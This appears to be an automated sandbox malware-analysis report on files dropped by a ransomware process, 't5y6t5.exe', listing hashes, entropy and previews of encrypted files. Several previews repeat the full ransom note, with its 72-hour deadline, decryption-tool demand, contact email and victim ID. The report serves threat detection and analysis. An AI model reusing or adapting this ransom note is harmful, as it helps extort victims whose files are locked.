                                                                                            SHA-256:ECF9FC95493073A1D70A570E1A34807571F97DBB86BE678251D0F18F7869F5B4
                                                                                            SHA-512:EC9158FB0B52A01B6A9BC7BF3FA20F827ACB9E338E6AD1B2858A847BBFA83DA605D7D5C0F1A0B00659994749C8DCC4FA7C53AE002BF9EA95115D1BE2C6EDAAE2
                                                                                            Malicious:true
                                                                                            Preview:...g...~.3j.6.....s..P.....w{M.<.....qwg[!.S=i|#Y7.Y?.X..~H......%..OW.....T?......EH2.........U....6#!.....hp.....w.j.a..2.....}..C.2....-.Z.8...L.R..LB.)Xc.<.'...E..E$aY.....ME~h6E..AZ./...X......;.8.x.i.8......>.N..>.ol./..c8G......s|.9....|3}.ezX...j..@.`.Q....7.mE. d..[.nV.....![.+=...D.....%..K..G..,^\y..f..Z..IV...h.T.{.Z....9..^.x>7J.....x..c.....E.m.{.S...Q..L.E*.. ._Q..D..._..F....t.j...ya.*{.n...y"...%.nja...Q].'..R...J...N.O.Z..ht......=.J..E.inh.^..Y.!.+.&..Yl.....'.]..M....9..pvR.a....u...g..#.9..3....]&.CT#.s&..N...C.......v80IG.S...kg....G.\x..cwl..JP.....0;+.[>5.U...#....'..O......uG.. .qO....._.<...%..P.tg#|:....5.F...7.9..b...i. .t3.aF..=.T....<...}Z9.9....w.". 2%....9......-......)*Ah.x..z)Q..R...m .......6.E.{...A<.>7....u.'.u.......U.q..C..0.K..>..Wp....[og]p.....:..g>K.uO.6..Zf.3..St...W.6..T.2....VQ.`..S....=MM..D..>.......,.K.z.T..K..L.*.....Id......i..zZ.?[..p.o.x2...._H.r.Qp..!..hx.d....6.O-...S2.|V..5;.i'T
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.240333588611576
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:XnlbTqKw3ZnDjOKqqKieRDPH8unIG2iTe1jLEwMp/jn:XlSKw3d/OKqpRDPHvnIGxTe1jLK7n
                                                                                            MD5:44E5E3CEBF7B257E2D09F8547F3FC27C
                                                                                            SHA1:A494D08F8B4C77E7C4E096D1BE0CCBE7D4C3E578
                                                                                            SHA-256:1D4FA257E349E3BE29332D01A3743361E37FCB3E2C1C1445404B2C0BE4E06465
                                                                                            SHA-512:DA98CF555568746CC82ED9F9D75778DCFF54EBB3D12D585887F650DB9814BDA50A5B9FE5AB4A995D4DEBFECE9741D19AD3718BD77C99B5AFD22E54F323E9556C
                                                                                            Malicious:true
                                                                                            Preview:.w>O".....A..r_...........y.Fe.3..{x.x....Q\.........g.....~...~.L..n=.vOo.F.J....y5..$.{9.{*l.q%.?.g........E..Lj&5....q\..~...w..5..<.t.[.DK.^.1|..`.".'-\dQ....O.7=....s..UXa...t..S......%....E.z[.....2...b...I.Rf5h9..,z...{l..+r.8%..I....=W.e.x+.W.dug@..I[@E~8.<..L.j.N0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.12872368975615
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:+YIlLVoCjaZsnTaHsqoZKXVBFXD5ZRcmBn4HBchcCzpVwyPJw+O7bJcvFN0ZdPcB:nIlxPa0TaH0ZKV6mB4hcqgvfO7bMX/42
                                                                                            MD5:8C7A3A5D1C76E89D289968823B030962
                                                                                            SHA1:9069F0EAD120BEC711A7ECC0E5DFD35DA5476594
                                                                                            SHA-256:8759BFB04643C0ED8F7AB53029A5C94BFE1CDFC0221BB090703E2312009A8249
                                                                                            SHA-512:4F16559EAAFA504718F9A6AC542D7AA19C3F216D42F75CF784DA9B3D638892C695D65EC879A31A143491383504509EF363BD5F61011B7E3C685D5CBD7F869FC6
                                                                                            Malicious:true
                                                                                            Preview:..,.i(....&..Af..........9`$.J...Y..T.P&K..]...F$....5......k5.I......{.\;..K...5.@.......dq.4..e.....y:.v.I.,.&....XT....."..B.H...=..3<.V.x...C...k.D...,u\K.&.-./.@.../l_.p.9{..J..P..o.......3C....c..:..t.S.Vw.|...q......G..<-.N.h..W/.@Km.i..@.P.|.4..l./p..b=.4....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):341
                                                                                            Entropy (8bit):7.398989796963018
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:TZU8MA1YvSmifkSQXHN3gxT0ffeXiSbwnyy/p7NuhpFSXBWoxkSZbXZlHn:TfMQYKVf7SwxTo+cn7pgzFSXgoycbn
                                                                                            MD5:1170F00A590941B5D345309D1B434530
                                                                                            SHA1:3014575D1A6FE9B6143895CD0ACA43835BA82B84
                                                                                            SHA-256:6A2541C3D9D4C3B8E86E441A92617472412A0C54883F7C68445920C8418460AA
                                                                                            SHA-512:23F56FDD8E699466D3587607A09D13BAEE477B2250AE3FA5CE3D7A4FCA9F4CFDCCA8B15840FA6F4A08C58C3A1CBAD630D1B34B5FA9AF453A3926077BC9D8260D
                                                                                            Malicious:false
                                                                                            Preview:.f,.'J3LE...M..W......Q.......L.t....C..7z..`........{.ci..ocked=1....2.q..9.@...4.AF.)s......1...\.Fnp.%...(.`.tV.....r....!.xN...9.I.>y..C.em....!f.z:v.kF.SM.s......Pn1......yl.p.G.{p...v......:...n..$V.p.....)..l(.$o.......;.637>...M......x....I.#~..85..3........dW;.*...Q.k.)r.9.........d...&.vx....3..?,..j8P`.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):571
                                                                                            Entropy (8bit):7.626344485647748
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:L4nL37WhnO4MKHrntw6t/0SeqUbfO/EjEnr0cGtKAm1q7nJbnCn:L07qZHzt10SevbInnr0pYAR7JbC
                                                                                            MD5:A8F27DACCF32E7B061E6CD235358B90E
                                                                                            SHA1:FC240E49799E340CC394CB496CD1493723DE3773
                                                                                            SHA-256:C65E37D3554F42C6994BAF19EE219EE4FACF813F76C918F15C0897AB75FA0CBC
                                                                                            SHA-512:1C1AFC5F279E4E8DDA7A8BFFBA8B0273CEEFF65E69C597DAF290EA478B368B9CF5BEC19515291BD55FC7EDE344A8D8FFD7021A279835D98459484B60D7918D29
                                                                                            Malicious:false
                                                                                            Preview:#..t uc..%.m.......N.G.u......w.De..v`.C...Y.m.lV~e;au...6..b[.>^..M..T2)..'.Z...v....7.X1..e.}e.F?.UQ..(..r....II..BAs.ny.p}.e..x[..6ql_...6..d....1j......gG......0Z..*........Y.,.YT...Ga....1.p.(........U.*...r.l9`....h....u_..Yj....K.'....Y.i'Q.._b._P..=j.....*.e5.#....,q...p...1..6E.4a...>{}~..r..lD..i_=.V.....D.iK.1:>S..z....S.s..B....6/.....!..:.3....jR.K....eN...:.......l......j1.h..7...<]Q,...a...U.z..Kb..v.c..k......$......~..|.DdS..f.'....9.;>...k.@.....7FU.F.6.a.S.Y.. 2h...._.^.-.w.6V./a.....-.!\H ...(.-..F-j.'.AE.)...:..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.159949891247461
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:9+ZXllxf+agrP4FV1L3TIAbwjUSlzZaY9FXpqR9291wg6lVwn:wvxf+aS4V3TIvjbldaY9CIF6lVwn
                                                                                            MD5:3550B0594B21411D4840B033E0E3F062
                                                                                            SHA1:1AD8E737DA2D9DDAB3C7BB9E7C9CA433FB053A99
                                                                                            SHA-256:5AD3B36B2BB6DF2C2DEB9E4E858C975E2EF24553AEC4E2D38A1D282B09D684BD
                                                                                            SHA-512:2504D08C46B9702BA65BF40EE517EAE2644035C7979C3A99740FC54FA912B1DC576C64DF1E41D7B60AFB4B239CCE580A2A261FAFBB133845575190B3F6F1C142
                                                                                            Malicious:false
                                                                                            Preview:.7^.<.O.....?. $..........^zp.._~.e.P.D...}...}..i....,..}.F......~...{).^J.N........[..4.8...k.6...Dk.}...&XE....V.a.....h..J./.../....7....yl....}c<..R..@1Kc.0|...}.2-y.f...v.v}....w...GuS.e.o?..X.I1.O.={.k#.....h......>..|...-...q6...."Xp.7....m..j..xaL.H...`_t.p.//..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.162714097145711
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:2tcCI6gAHjJDkgXFNgbKId/mcKPPMobuxCI6KS2hwdN5FBRhKCLxem2n:xGNJNM1d/rK3MoKbhScW5VQLn
                                                                                            MD5:26D54E1365799AD433E97A891B7451FA
                                                                                            SHA1:6A89B961246A934099C436B752C980A029B49C51
                                                                                            SHA-256:0DFA2B1C95CEC5D0B87C05BBA817F717D1ABFD3D045DA1DA846615D0552E38EA
                                                                                            SHA-512:E079437A322750D3B5423053F1851425D6FC283FC2A96FE3C31E2F5AFD5B39284E9335D40994E830DF02CCC5C5D2FF1A6C30985B025FCE3B8A6B3C81DBF74231
                                                                                            Malicious:false
                                                                                            Preview:8.....H......*..*.dW...3@....Y.....*Q..&..._...1!>....)....ow...C.6&.O..=T5f]..TC>bI...<..Z.........1.B..yl.f....XO{W..g..<N`.F..+.).d...].>.....5v...._PO.6/..B..MN.......FL..!..S!J..u..r:.k1|A....B..{...sT\T.e./..>.....1=.V......_.B[n..ur.....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8431998821298405
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:nioMxyInqogxiGdZiizicb+TIxpR67Pe+SVUmzDugAa8xHrWZ8FIlX/l57T3WUqz:H1dogxiqZHzipTIx/6TeDV9BAagLWZ8/
                                                                                            MD5:F5CD8827C1A26F9E60773F334EEAFAAD
                                                                                            SHA1:51C17BB7CA13568F424121F6BFFB21C050223442
                                                                                            SHA-256:E97EE64D54BE3093366C95DF09DEE86A2F8217E616DCC0489737A6460F220EEB
                                                                                            SHA-512:8CA37242CB8557F52707D7AB56953C4D1AA56AA4D0B97B36015C5B495DB1B1E699D879EA3DDD9C4120869A554A73578797F63A1885D70B9C53EC7DDB1AB0495E
                                                                                            Malicious:false
                                                                                            Preview:j[..$..5.'.<A..ej..e.!..M...4.=.!s..z..y\......k...R.-...K.}K...Z.:V...yYxdnHYtF{.4.. .a..Y.\...:)....X.......@Q.}.R...V.-2.i...6..9..X..m.'*L.q...~)[.../P.3.."jYFw./...G....<..+......F..g?s8Bl.B^...`OW....T.f\p.f.!..&'U...mZ..+m..D.....o.^.\....b..W.B".w5........q.N...W.....DV.r..t...^.......3.e.$..J_V...Y...,...6....C...<..p.~.(.0.E.=^R4~..2.X....FM...".G.6....N..E.O.....al....s.v.V...mQaA_XRe.=fT...W..P......[.W..1.#!.."..`...."..Ch;..~.........+m...=....$..{wQ...S..g$..-...V........!.o8.9/...8....tN...../)>.m..+...............5p.M.<./.[..LY.R......5BXu._....T+.........PlN.W.3..\..du..Rq,.Ye...eC.45.0.^n72+.#.P......~.r...G..Bd.P..W..X....1..p....].E..1..u$C.l......}.M.^j.h...8G.._=q. .h...5.W....'..p..f.j_KW.xu.......@..T.....`.i.J......~....s._D|....)1.N..7IT._.......o..b.&.3T"@.....B......S<.lz;%.g.;..[i(^.Y4\..W....|.#+.)E.C....rP..'Sd.Y4....j.m......4..!zL5.=....M...-....oE!.FO.4{{......fw...R....I..KH.C....d}.j....V..F...]\S.......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8431998821298405
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:nioMxyInqogxiGdZiizicb+TIxpR67Pe+SVUmzDugAa8xHrWZ8FIlX/l57T3WUqz:H1dogxiqZHzipTIx/6TeDV9BAagLWZ8/
                                                                                            MD5:F5CD8827C1A26F9E60773F334EEAFAAD
                                                                                            SHA1:51C17BB7CA13568F424121F6BFFB21C050223442
                                                                                            SHA-256:E97EE64D54BE3093366C95DF09DEE86A2F8217E616DCC0489737A6460F220EEB
                                                                                            SHA-512:8CA37242CB8557F52707D7AB56953C4D1AA56AA4D0B97B36015C5B495DB1B1E699D879EA3DDD9C4120869A554A73578797F63A1885D70B9C53EC7DDB1AB0495E
                                                                                            Malicious:false
                                                                                            Preview:j[..$..5.'.<A..ej..e.!..M...4.=.!s..z..y\......k...R.-...K.}K...Z.:V...yYxdnHYtF{.4.. .a..Y.\...:)....X.......@Q.}.R...V.-2.i...6..9..X..m.'*L.q...~)[.../P.3.."jYFw./...G....<..+......F..g?s8Bl.B^...`OW....T.f\p.f.!..&'U...mZ..+m..D.....o.^.\....b..W.B".w5........q.N...W.....DV.r..t...^.......3.e.$..J_V...Y...,...6....C...<..p.~.(.0.E.=^R4~..2.X....FM...".G.6....N..E.O.....al....s.v.V...mQaA_XRe.=fT...W..P......[.W..1.#!.."..`...."..Ch;..~.........+m...=....$..{wQ...S..g$..-...V........!.o8.9/...8....tN...../)>.m..+...............5p.M.<./.[..LY.R......5BXu._....T+.........PlN.W.3..\..du..Rq,.Ye...eC.45.0.^n72+.#.P......~.r...G..Bd.P..W..X....1..p....].E..1..u$C.l......}.M.^j.h...8G.._=q. .h...5.W....'..p..f.j_KW.xu.......@..T.....`.i.J......~....s._D|....)1.N..7IT._.......o..b.&.3T"@.....B......S<.lz;%.g.;..[i(^.Y4\..W....|.#+.)E.C....rP..'Sd.Y4....j.m......4..!zL5.=....M...-....oE!.FO.4{{......fw...R....I..KH.C....d}.j....V..F...]\S.......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.884088330708015
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:wANEr+6RusqVjjt+bv401Dt3k5pUfxBeyejBC17uZjEfvuHuV6TgzYGJ/4j:wANEK4wVjQv40Nt3k5piBets7uZY+um1
                                                                                            MD5:21683C427EDDE29A4BBF7BA11AD00D25
                                                                                            SHA1:53CEA54C3DCBFA69251DA6F8C3DE31D892733D82
                                                                                            SHA-256:A84CA614832D91BC3BBB4291605F25BE32A287BC0519B1FC5555380F5614A46E
                                                                                            SHA-512:77AE4E1762D7986EE535E5BC65421F3DDA7F0826FB5EE3C82CBDE41B66BD3AC559CF5323B98583A085E4904FBECAE1A19B822D2461F4D1F547F7EC48AB8529CA
                                                                                            Malicious:true
